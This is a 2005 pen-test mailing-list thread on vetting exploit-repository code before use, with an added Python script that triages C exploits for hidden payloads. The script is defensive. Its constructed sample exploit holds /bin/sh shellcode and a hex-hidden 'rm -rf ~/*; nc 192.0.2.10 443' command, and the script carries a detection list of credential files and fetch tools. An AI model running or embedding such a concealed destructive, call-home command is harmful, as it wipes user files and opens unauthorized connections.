Penetration Testing mailing list archives
RE: Exploit Repositories and Due Diligence
From: "Sahir Hidayatullah" <sahirh () mielesecurity com>
Date: Fri, 10 Jun 2005 12:19:30 +0530
Good question! Personally, I feel exploit repositories only speed up the time it takes to identify whether an exploit exists or not. You'll invariably find that the exploit code itself gives insufficient information about the vulnerability in the comments, so you'll hit Securityfocus' or similar for more information. You *could* just get the exploit from there, but when you're in the middle of a test and you discover something not so standard (for example some random embedded device) you want to quickly look up whether an exploit exists.

If you have testers that are just gcc'ing the exploit and firing it at a target without understanding the source, you're asking for trouble, especially with respect to non-standard systems.

What I have noticed is people relying too much on exploit repositories: they will identify a system, search the repository, and if they don't find a match, move on. This totally skips the creative process of approaching the system manually looking for 'common' problems -- broken authentication, default passwords etc.

The way I like to work is ID the systems and their services, and make a table of exploits that I could tentatively use against each service. Then move to manual testing; if nothing comes out of that, pick an exploit, understand it, and if it passes the test, give it a shot.

That said, updatable exploit repositories like SecurityForest (CVS based) are a godsend for managing your collection, and a great start for building one.

Regards,

Sahir Hidayatullah
Technical Consultant - Information Security
--------------------------------------
MIEL e-Security Pvt. Ltd.
C- 611 / 612, Floral Deck Plaza, MIDC Central Road, Andheri (E), Mumbai 400 093, India.
Tel No: +91 (022) 2821 5050
PGP KeyID: 0x4F5EC345
Fingerprint: F4C2 7274 792E 8E39 D90D BA02 C070 B4BF 4F5E C345

-----Original Message-----
From: Jeff [mailto:jb () jbware net]
Sent: Friday, June 10, 2005 6:50 AM
To: pen-test () securityfocus com
Subject: Exploit Repositories and Due Diligence

I have a question regarding the use of exploit repositories (including projects like Metasploit, and compilations on bootable distros like Whoppix). With all of the large exploit repositories used to make pen testing faster and easier, what methods do you use to ensure you've done your due diligence in not unleashing something actually harmful on your clients? I have my own thoughts, such as googling and superficial|deep code reviews, but ultimately my concern is over the malicious hiding of intentions.

Thanks for any insights and suggestions.

- Jeff
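The due-diligence step the two messages are arguing about (Jeff's worry about hidden malicious intent, Sahir's "understand the source before you gcc it"), as an added example that is not part of either post: a small Python triage script that decodes the C string literals of a downloaded exploit the way the compiler would, runs a strings-style scan over the result, and flags what a backdoored "exploit" typically hides: a destructive command, a hard-coded call-home address, or a libc call that spawns a shell on the tester's own box. The sample exploit source, the suspicious-fragment list and the 192.0.2.10 address are all constructed for this example and are not from any real repository.

```python
"""Static triage of a C exploit from a repository, before anyone compiles it.
Added example, not code from the original thread; all sample input is constructed."""
import re
from dataclasses import dataclass, field

# Fragments that have no business inside a payload whose advertised job is to pop
# a shell on the *target*. The list is an assumption; extend it per engagement.
SUSPICIOUS = (b"rm -rf", b"/etc/passwd", b"/etc/shadow", b"authorized_keys",
              b"crontab", b"wget ", b"curl ", b"mail ", b"| sh", b"chmod")

STRING_LITERAL = re.compile(r'"((?:[^"\\\n]|\\.)*)"')   # one C string literal
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")             # same rule as `strings -n 4`
IPV4 = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SHELL_CALL = re.compile(r"\b(system|popen|execl|execlp|execv|execvp|execve)\s*\(")
SIMPLE_ESCAPES = {"n": 10, "t": 9, "r": 13, "a": 7, "b": 8, "f": 12, "v": 11,
                  "\\": 92, '"': 34, "'": 39, "?": 63}


def decode_c_literal(body: str) -> bytes:
    """Turn the text between the quotes of a C literal into the bytes it denotes."""
    out, i = bytearray(), 0
    while i < len(body):
        if body[i] != "\\":
            out.append(ord(body[i]) & 0xFF)
            i += 1
            continue
        nxt = body[i + 1]
        if nxt == "x":                       # \xHH, the form exploit code uses
            m = re.match(r"[0-9A-Fa-f]{1,2}", body[i + 2:])
            if m:
                out.append(int(m.group(0), 16))
                i += 2 + len(m.group(0))
                continue
        if nxt in "01234567":                # \NNN octal
            m = re.match(r"[0-7]{1,3}", body[i + 1:])
            out.append(int(m.group(0), 8) & 0xFF)
            i += 1 + len(m.group(0))
            continue
        out.append(SIMPLE_ESCAPES.get(nxt, ord(nxt)))
        i += 2
    return bytes(out)


def extract_literals(source: str) -> list[bytes]:
    """Decode every string literal; adjacent literals are joined as the compiler joins them."""
    blobs, current, last_end = [], bytearray(), None
    for m in STRING_LITERAL.finditer(source):
        if last_end is not None and source[last_end:m.start()].strip():
            blobs.append(bytes(current))     # something other than whitespace between them
            current = bytearray()
        current += decode_c_literal(m.group(1))
        last_end = m.end()
    if last_end is not None:
        blobs.append(bytes(current))
    return blobs


@dataclass
class Report:
    blobs: int                                   # number of (joined) string literals
    strings: list = field(default_factory=list)  # printable runs found inside them
    findings: list = field(default_factory=list)


def triage(source: str) -> Report:
    """Scan one C source file and return what a reviewer should look at first."""
    blobs = extract_literals(source)
    report = Report(len(blobs))
    for blob in blobs:
        for s in PRINTABLE.findall(blob):
            report.strings.append(s)
            for bad in SUSPICIOUS:
                if bad in s:
                    report.findings.append(f"suspicious fragment {bad!r} in literal {s!r}")
            if IPV4.search(s):
                report.findings.append(f"hard-coded IPv4 address in literal {s!r}")
    # A remote exploit has no reason to spawn a shell on the attacker's box; fakes often do.
    for m in SHELL_CALL.finditer(source):
        line = source.count("\n", 0, m.start()) + 1
        report.findings.append(f"libc shell call {m.group(1)}() on line {line}")
    return report


# Constructed sample: a plausible /bin/sh payload up front, a second hex blob
# that nobody decodes, and a system() call that runs it before any packet is sent.
SAMPLE_EXPLOIT = r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Linux x86 execve /bin/sh payload, the part a reader expects to see */
char shellcode[] =
    "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

/* init blob that nobody decodes */
char setup[] = "\x72\x6d\x20\x2d\x72\x66\x20\x7e\x2f\x2a\x3b\x20"
               "\x6e\x63\x20\x31\x39\x32\x2e\x30\x2e\x32\x2e\x31\x30\x20\x34\x34\x33";

int main(int argc, char **argv) {
    char buf[1024];
    if (argc < 2) { printf("usage: %s host\n", argv[0]); return 1; }
    system(setup);   /* runs on the tester's box before any packet is sent */
    memset(buf, 0x90, sizeof buf);
    memcpy(buf + sizeof buf - sizeof shellcode, shellcode, sizeof shellcode);
    /* ... connect to argv[1] and send buf ... */
    return 0;
}
'''

if __name__ == "__main__":
    rep = triage(SAMPLE_EXPLOIT)
    print(f"{rep.blobs} string literals, {len(rep.strings)} printable strings")
    for s in rep.strings:
        print("  str:", s)
    for f in rep.findings:
        print("  FLAG:", f)
```

Run against the sample, the /bin/sh payload decodes to the harmless `Ph//shh/bin` and passes, while the second blob decodes to `rm -rf ~/*; nc 192.0.2.10 443` and is flagged twice (destructive command, hard-coded address), and the `system()` call is flagged as a third finding. Two caveats: a payload that is encoded or self-decrypting shows no strings at all, so a clean strings pass proves nothing and the bytes still need to be disassembled (for example `objdump -D -b binary -m i386 shellcode.bin` or `ndisasm -b 32 shellcode.bin`) and read, and C character literals such as `'"'` or quotes inside comments can confuse the literal regex, so treat the report as a pointer to what to read by hand, not as a verdict. Whatever the result, the first run belongs in a throwaway VM with no route to the client's network.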
Current thread:
- Exploit Repositories and Due Diligence Jeff (Jun 09)
- RE: Exploit Repositories and Due Diligence Leandro Reox (Jun 09)
- RE: Exploit Repositories and Due Diligence Sahir Hidayatullah (Jun 10)
- RE: Exploit Repositories and Due Diligence Carl Tucker (Jun 14)
- RE: Exploit Repositories and Due Diligence Carl Tucker (Jun 20)